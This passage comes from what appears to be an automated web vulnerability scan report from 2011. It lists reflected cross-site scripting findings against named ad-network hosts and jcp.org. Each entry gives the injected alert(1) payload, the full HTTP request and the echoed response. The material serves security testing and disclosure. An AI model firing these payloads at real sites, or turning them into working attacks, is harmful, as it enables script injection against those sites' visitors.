Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhra
...[SNIP]...

4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77df7"-alert(1)-"55e8aaf402d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81D38C248A8FC0D3AE4AEA54D3D89A0E; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt69exsw"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6da0d"-alert(1)-"9d189a7cf3d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85A39D4B6E9886329A268FD24420D20D; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt69exl9"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

4.114. http://g2.gumgum.com/services/get [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64628<script>alert(1)</script>adbac286e48 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/get?callback=GUMGUM.startServices64628<script>alert(1)</script>adbac286e48&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 17 Sep 2011 00:53:48 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Content-Length: 304
Connection: keep-alive

GUMGUM.startServices64628<script>alert(1)</script>adbac286e48({"at":{"mh":200,"sf":true,"mw":200,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantcast":true},"pag":{"pvid":"
...[SNIP]...

4.115. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19be'%3balert(1)//63b277fa96a was submitted in the redir parameter. This input was echoed as a19be';alert(1)//63b277fa96a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1775927586%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2Fa19be'%3balert(1)//63b277fa96a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb549359=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb201818=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII2IgDEAoYUSBRKFEwzN_P8wQQzN_P8wQYUA..; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb884=![nC'208WMcbJO=)IE.8$p5s4?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP8hj40ddzOJZ7__________L73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAdx2drAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ16m@n8l)=m!zsC8%0Q!816usE!>w6Lc1t!<6-c4nLmV#(f3[iRHV@?K@i[?NGU:QTKx<k4Ji.4N$kk1OJY^A'Bdr9u)1l85nIwbM6sex^qF_k7^/suduT>zr!%>zw81Y'8Y7?BMSJYDNCC'Y#an; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:54:36 GMT
Content-Length: 246

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/a19be';alert(1)//63b277fa96a">
...[SNIP]...

4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ibmwebsphere.tt.omtrdc.net
Path:   /m2/ibmwebsphere/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6&mboxId=0&mboxTime=1316203014547&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss
Cookie: mboxSession=1316221012167-554408; mboxPC=1316221012167-554408.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:56:52 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 216
Date: Fri, 16 Sep 2011 19:56:52 GMT
Server: Test & Target

mboxFactories.get('default').get('eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316221012167-554408.19");

4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220749_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220751_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:31 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 578

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220747_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:27 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9
...[SNIP]...

4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jcp.org
Path:   /en/jsr/all

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:57:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 411049


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>



...[SNIP]...
<input name="uri" value="/en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1" type="hidden">
...[SNIP]...

4.121. http://js.revsci.net/gateway/gw.js [ali parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023ea4cb'%3balert(1)//4b86e2820c&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5217

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
);
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023ea4cb';alert(1)//4b86e2820c');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.122. http://js.revsci.net/gateway/gw.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627fe30b'%3balert(1)//803e9c23130&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
